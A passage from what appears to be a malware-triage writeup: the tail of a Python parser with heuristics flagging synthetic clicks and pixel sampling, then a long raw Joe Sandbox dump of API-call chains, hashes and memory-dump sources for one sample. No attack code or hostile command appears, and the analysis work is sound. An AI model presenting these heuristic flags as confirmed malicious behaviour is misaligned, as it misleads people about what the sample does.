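    fields: dict = field(default_factory=dict)   # "API ID", fuzzy hashes, ...

    def chain(self):
        return [c.api for c in self.calls]


def _parse_arg(tok):
    tok = tok.strip()
    if tok in ("", "?"):
        return None                 # unresolved by the sandbox's static pass
    try:
        return int(tok, 16)
    except ValueError:
        return tok


def parse_records(text):
    """Split the text into one Record per 'APIs' header."""
    records, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = Record()
            records.append(cur)
            section = "apis"
            continue
        if cur is None:
            continue
        if line in ("Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"):
            section = line
            continue
        if not line.startswith("•"):
            continue
        if section == "apis":
            m = API_RE.search(line)
            if m:
                api, module, args, ref = m.groups()
                arglist = [_parse_arg(a) for a in args.split(",")] if args else []
                cur.calls.append(Call(api, module, arglist, ref,
                                      subcall="Part of subcall" in line))
        else:
            m = FIELD_RE.match(line)
            if m:
                cur.fields[m.group(1).strip()] = m.group(2).strip()
    return records


def flag_record(rec):
    """Editor's own triage heuristics over one function's API chain."""
    findings = []
    msgs = [c.args[1] for c in rec.calls
            if c.api in ("PostMessageW", "PostMessageA", "SendMessageW", "SendMessageA")
            and len(c.args) > 1 and isinstance(c.args[1], int)]
    names = [WM_NAMES.get(m, f"0x{m:04X}") for m in msgs]
    if "WM_LBUTTONDOWN" in names and "WM_LBUTTONUP" in names[names.index("WM_LBUTTONDOWN"):]:
        findings.append("synthetic left-click: WM_LBUTTONDOWN then WM_LBUTTONUP posted to a window")
    chain = rec.chain()
    if "GetPixel" in chain and ("GetDC" in chain or "GetWindowDC" in chain):
        findings.append("screen pixel sampling via GetDC/GetPixel")
    if "GetForegroundWindow" in chain:
        findings.append("reads the foreground window handle")
    return findings


if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print(rec.fields.get("API ID", "?"), "->", " / ".join(rec.chain()))
        for f in flag_record(rec):
            print("   !", f)
```

`parse_records` keys each record on the `APIs` header and tolerates calls printed without an argument list (`GetForegroundWindow.USER32 ref: ...`) and nested `Part of subcall function` lines; the fuzzy hashes and `API ID` land in `fields` so records can be clustered across reports. The message-constant check looks at the second argument only when the sandbox resolved it to a literal, so a `?` never produces a false click finding.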
                                                                                                            APIs
                                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 00D8CDC6
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D8CDE9
                                                                                                              • Part of subcall function 00D83820: RtlAllocateHeap.NTDLL(00000000,?,00E21444,?,00D6FDF5,?,?,00D5A976,00000010,00E21440,00D513FC,?,00D513C6,?,00D51129), ref: 00D83852
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00D8CE0F
                                                                                                            • _free.LIBCMT ref: 00D8CE22
                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D8CE31
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 336800556-0
                                                                                                            • Opcode ID: e56d5ce80fd846c3dab70a61201c5d54c30fc66a520481162a13b7c53ee8a298
                                                                                                            • Instruction ID: c9b555dd217ca46591f2a478c731e1cf600b63b03af5023aea58df64b96fc8ee
                                                                                                            • Opcode Fuzzy Hash: e56d5ce80fd846c3dab70a61201c5d54c30fc66a520481162a13b7c53ee8a298
                                                                                                            • Instruction Fuzzy Hash: A3018472621755BF232236B66C88D7B696DDFC6BA13195129F905C7201EA718D0283B0
                                                                                                            APIs
                                                                                                            • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00D69693
                                                                                                            • SelectObject.GDI32(?,00000000), ref: 00D696A2
                                                                                                            • BeginPath.GDI32(?), ref: 00D696B9
                                                                                                            • SelectObject.GDI32(?,00000000), ref: 00D696E2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ObjectSelect$BeginCreatePath
                                                                                                            • String ID:
                                                                                                            • API String ID: 3225163088-0
                                                                                                            • Opcode ID: 1b31f2a55444b2d80a70125cbfdc781fd32b805751d774056654e5ffa2692b54
                                                                                                            • Instruction ID: c01486b9caae8be08cf5c38fb854973fd16eabbc808cf8539d5379d9c80ac110
                                                                                                            • Opcode Fuzzy Hash: 1b31f2a55444b2d80a70125cbfdc781fd32b805751d774056654e5ffa2692b54
                                                                                                            • Instruction Fuzzy Hash: 66219570811345EFDB219FA5DC647A97B68BBA1355F140255F410B61B0D3709ADBCFB0
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _memcmp
                                                                                                            • String ID:
                                                                                                            • API String ID: 2931989736-0
                                                                                                            • Opcode ID: 49c13ec394d5958da45a2b9dd1ea04a8ac0514fb2a6e1885d5dedf7032d5b20d
                                                                                                            • Instruction ID: b303b760af3aa6cbd78458015d091c1f1f6bf7b9dc4131082689be99953314de
                                                                                                            • Opcode Fuzzy Hash: 49c13ec394d5958da45a2b9dd1ea04a8ac0514fb2a6e1885d5dedf7032d5b20d
                                                                                                            • Instruction Fuzzy Hash: A701B575741609FFE2086615AD82FFB735CDB21398F244120FD0A9A245FB60EE1582B0
                                                                                                            APIs
                                                                                                            • GetLastError.KERNEL32(?,?,?,00D7F2DE,00D83863,00E21444,?,00D6FDF5,?,?,00D5A976,00000010,00E21440,00D513FC,?,00D513C6), ref: 00D82DFD
                                                                                                            • _free.LIBCMT ref: 00D82E32
                                                                                                            • _free.LIBCMT ref: 00D82E59
                                                                                                            • SetLastError.KERNEL32(00000000,00D51129), ref: 00D82E66
                                                                                                            • SetLastError.KERNEL32(00000000,00D51129), ref: 00D82E6F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 3170660625-0
                                                                                                            • Opcode ID: 8c78f6f1da5596fe95852d424fbc6c57a1bd26f65675b3671d0c3faa9c5a351f
                                                                                                            • Instruction ID: 6793db89a6d5bd3d93dce3bec22865197e56e685c10dba81c02cb07f1f9f6926
                                                                                                            • Opcode Fuzzy Hash: 8c78f6f1da5596fe95852d424fbc6c57a1bd26f65675b3671d0c3faa9c5a351f
                                                                                                            • Instruction Fuzzy Hash: 3101F4323866007BC61337356C8AE3B266DEBC17B1B294028F865E22D2EF24CC014334
                                                                                                            APIs
                                                                                                            • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DAFF41,80070057,?,?,?,00DB035E), ref: 00DB002B
                                                                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DAFF41,80070057,?,?), ref: 00DB0046
                                                                                                            • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DAFF41,80070057,?,?), ref: 00DB0054
                                                                                                            • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DAFF41,80070057,?), ref: 00DB0064
                                                                                                            • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DAFF41,80070057,?,?), ref: 00DB0070
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                            • String ID:
                                                                                                            • API String ID: 3897988419-0
                                                                                                            • Opcode ID: 60ff993396d6232798b9978e5e4077f361d6b6a953eac12eb8768324e8556496
                                                                                                            • Instruction ID: 83a22c2e91d948384dee1b12d0d952cd9887e8cb4a8846b02ca17adbed6404eb
                                                                                                            • Opcode Fuzzy Hash: 60ff993396d6232798b9978e5e4077f361d6b6a953eac12eb8768324e8556496
                                                                                                            • Instruction Fuzzy Hash: 83017872610304EBDB116F68DC84BAA7EADEB48792F145124F906DA210EB71DD418BB0
                                                                                                            APIs
                                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 00DBE997
                                                                                                            • QueryPerformanceFrequency.KERNEL32(?), ref: 00DBE9A5
                                                                                                            • Sleep.KERNEL32(00000000), ref: 00DBE9AD
                                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 00DBE9B7
                                                                                                            • Sleep.KERNEL32 ref: 00DBE9F3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                            • String ID:
                                                                                                            • API String ID: 2833360925-0
                                                                                                            • Opcode ID: d0815c595a6b3a6742965871860c1d91a4578dcbcec58376a58927220a99c947
                                                                                                            • Instruction ID: 2d13377f4175f127eda9d2859450cf0d01ebbb7d939c0343278116a30c0f3869
                                                                                                            • Opcode Fuzzy Hash: d0815c595a6b3a6742965871860c1d91a4578dcbcec58376a58927220a99c947
                                                                                                            • Instruction Fuzzy Hash: 1C011331D01629DBCF00ABE9DC99AEDFBB8FB09701F000556E942B7241CB30A6598BB1
                                                                                                            APIs
                                                                                                            • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00DB1114
                                                                                                            • GetLastError.KERNEL32(?,00000000,00000000,?,?,00DB0B9B,?,?,?), ref: 00DB1120
                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00DB0B9B,?,?,?), ref: 00DB112F
                                                                                                            • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00DB0B9B,?,?,?), ref: 00DB1136
                                                                                                            • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00DB114D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 842720411-0
                                                                                                            • Opcode ID: a3f2d5dc6934c6128ab8b4237295fb713df8b32b11b51198c9176e16e8a1adac
                                                                                                            • Instruction ID: 5f3fd633dec8bc08fcdcd90eac917bc5d1d2e12abc41da55aa59cb014ce28db8
                                                                                                            • Opcode Fuzzy Hash: a3f2d5dc6934c6128ab8b4237295fb713df8b32b11b51198c9176e16e8a1adac
                                                                                                            • Instruction Fuzzy Hash: AA016D79200305BFDB116F68DC89AAA3B6EEF863A0B140418FA45C7360DA31DC018A70
                                                                                                            APIs
                                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00DB0FCA
                                                                                                            • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00DB0FD6
                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00DB0FE5
                                                                                                            • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00DB0FEC
                                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00DB1002
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 44706859-0
                                                                                                            • Opcode ID: 8f48fa036f202d0cca0a636921480b5c0390d3fec0aafe34232fb3978fa5cad4
                                                                                                            • Instruction ID: 7050e4a4130a42a7cd232927cbf11a52fd1e4da362b79a30433cf77b67a5db98
                                                                                                            • Opcode Fuzzy Hash: 8f48fa036f202d0cca0a636921480b5c0390d3fec0aafe34232fb3978fa5cad4
                                                                                                            • Instruction Fuzzy Hash: FDF04F39210345EBD7216FA49C8DF963B6DEF8A761F544419FD46CA351CA70DC418A70
                                                                                                            APIs
                                                                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00DB102A
                                                                                                            • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00DB1036
                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00DB1045
                                                                                                            • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00DB104C
                                                                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00DB1062
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 44706859-0
                                                                                                            • Opcode ID: 14891a8e930f097bc05818a0e6e0bf5c3387c4429e1f3443991edfdd35f780c6
                                                                                                            • Instruction ID: 155908641950d4f238a14fa5b6ba57223cc686dc4f4c53061d3f47a8556511db
                                                                                                            • Opcode Fuzzy Hash: 14891a8e930f097bc05818a0e6e0bf5c3387c4429e1f3443991edfdd35f780c6
                                                                                                            • Instruction Fuzzy Hash: 87F06239210341EBD7216FA4EC9AF9A3B6DEF8A761F540414FD46CB350CA70D8418A70
                                                                                                            APIs
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00DC017D,?,00DC32FC,?,00000001,00D92592,?), ref: 00DC0324
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00DC017D,?,00DC32FC,?,00000001,00D92592,?), ref: 00DC0331
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00DC017D,?,00DC32FC,?,00000001,00D92592,?), ref: 00DC033E
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00DC017D,?,00DC32FC,?,00000001,00D92592,?), ref: 00DC034B
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00DC017D,?,00DC32FC,?,00000001,00D92592,?), ref: 00DC0358
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00DC017D,?,00DC32FC,?,00000001,00D92592,?), ref: 00DC0365
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2962429428-0
                                                                                                            • Opcode ID: 09cec1c04694b3cf57430f7f208975bf2738aa2e8e5f97878fb1ae241ed99cef
                                                                                                            • Instruction ID: 2ba2cd87c86d15d9cd20019386dcefba8c0baad8c0c238fe6155bf604f7cc4e8
                                                                                                            • Opcode Fuzzy Hash: 09cec1c04694b3cf57430f7f208975bf2738aa2e8e5f97878fb1ae241ed99cef
                                                                                                            • Instruction Fuzzy Hash: F401A272800B56DFCB31AF66D880912FBF9BF503153198A3FD19652931C371A955CF90
                                                                                                            APIs
                                                                                                            • _free.LIBCMT ref: 00D8D752
                                                                                                              • Part of subcall function 00D829C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00D8D7D1,00000000,00000000,00000000,00000000,?,00D8D7F8,00000000,00000007,00000000,?,00D8DBF5,00000000), ref: 00D829DE
                                                                                                              • Part of subcall function 00D829C8: GetLastError.KERNEL32(00000000,?,00D8D7D1,00000000,00000000,00000000,00000000,?,00D8D7F8,00000000,00000007,00000000,?,00D8DBF5,00000000,00000000), ref: 00D829F0
                                                                                                            • _free.LIBCMT ref: 00D8D764
                                                                                                            • _free.LIBCMT ref: 00D8D776
                                                                                                            • _free.LIBCMT ref: 00D8D788
                                                                                                            • _free.LIBCMT ref: 00D8D79A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 776569668-0
                                                                                                            • Opcode ID: e965c3235febddf77110bad050091ebb8fdae2ab6b5f5de75681e243e30665c7
                                                                                                            • Instruction ID: 8215f3b8ca538b7306dcbb3df07e233c1f8621a9da05061131f8a94457883ed6
                                                                                                            • Opcode Fuzzy Hash: e965c3235febddf77110bad050091ebb8fdae2ab6b5f5de75681e243e30665c7
                                                                                                            • Instruction Fuzzy Hash: 8FF0FF72584204AB8625FB69FDC5C6A77EEFB447107A94805F049E7581C734FC808B74
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00DB5C58
                                                                                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 00DB5C6F
                                                                                                            • MessageBeep.USER32(00000000), ref: 00DB5C87
                                                                                                            • KillTimer.USER32(?,0000040A), ref: 00DB5CA3
                                                                                                            • EndDialog.USER32(?,00000001), ref: 00DB5CBD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 3741023627-0
                                                                                                            • Opcode ID: fcfd7bea396cb283976340e40efc48aa480f99d1a9b54e257c12e0fecf20e455
                                                                                                            • Instruction ID: ff1fc030d80256d833b6ef3357cf1833721668c4519435cbd323249c5feb68fd
                                                                                                            • Opcode Fuzzy Hash: fcfd7bea396cb283976340e40efc48aa480f99d1a9b54e257c12e0fecf20e455
                                                                                                            • Instruction Fuzzy Hash: A2018630510B44EBEB206B10ED8EFE67BB9BB00B05F04159DA583A51E5DBF0A9858AB0
                                                                                                            APIs
                                                                                                            • _free.LIBCMT ref: 00D822BE
                                                                                                              • Part of subcall function 00D829C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00D8D7D1,00000000,00000000,00000000,00000000,?,00D8D7F8,00000000,00000007,00000000,?,00D8DBF5,00000000), ref: 00D829DE
                                                                                                              • Part of subcall function 00D829C8: GetLastError.KERNEL32(00000000,?,00D8D7D1,00000000,00000000,00000000,00000000,?,00D8D7F8,00000000,00000007,00000000,?,00D8DBF5,00000000,00000000), ref: 00D829F0
                                                                                                            • _free.LIBCMT ref: 00D822D0
                                                                                                            • _free.LIBCMT ref: 00D822E3
                                                                                                            • _free.LIBCMT ref: 00D822F4
                                                                                                            • _free.LIBCMT ref: 00D82305
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 776569668-0
                                                                                                            • Opcode ID: 53664eb8cef8df4815413a6071fed77f6e5c18cb938217d2ef832ccdf27e8402
                                                                                                            • Instruction ID: 4235ff9d2ae3485031c19c36387b67f85d6d393b093fce9adebeb101751bd48a
                                                                                                            • Opcode Fuzzy Hash: 53664eb8cef8df4815413a6071fed77f6e5c18cb938217d2ef832ccdf27e8402
                                                                                                            • Instruction Fuzzy Hash: 6BF05E719C0120AF8632BF56BC418683B64F729760716054AF410F23B2C734195BAFF8
                                                                                                            APIs
                                                                                                            • EndPath.GDI32(?), ref: 00D695D4
                                                                                                            • StrokeAndFillPath.GDI32(?,?,00DA71F7,00000000,?,?,?), ref: 00D695F0
                                                                                                            • SelectObject.GDI32(?,00000000), ref: 00D69603
                                                                                                            • DeleteObject.GDI32 ref: 00D69616
                                                                                                            • StrokePath.GDI32(?), ref: 00D69631
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
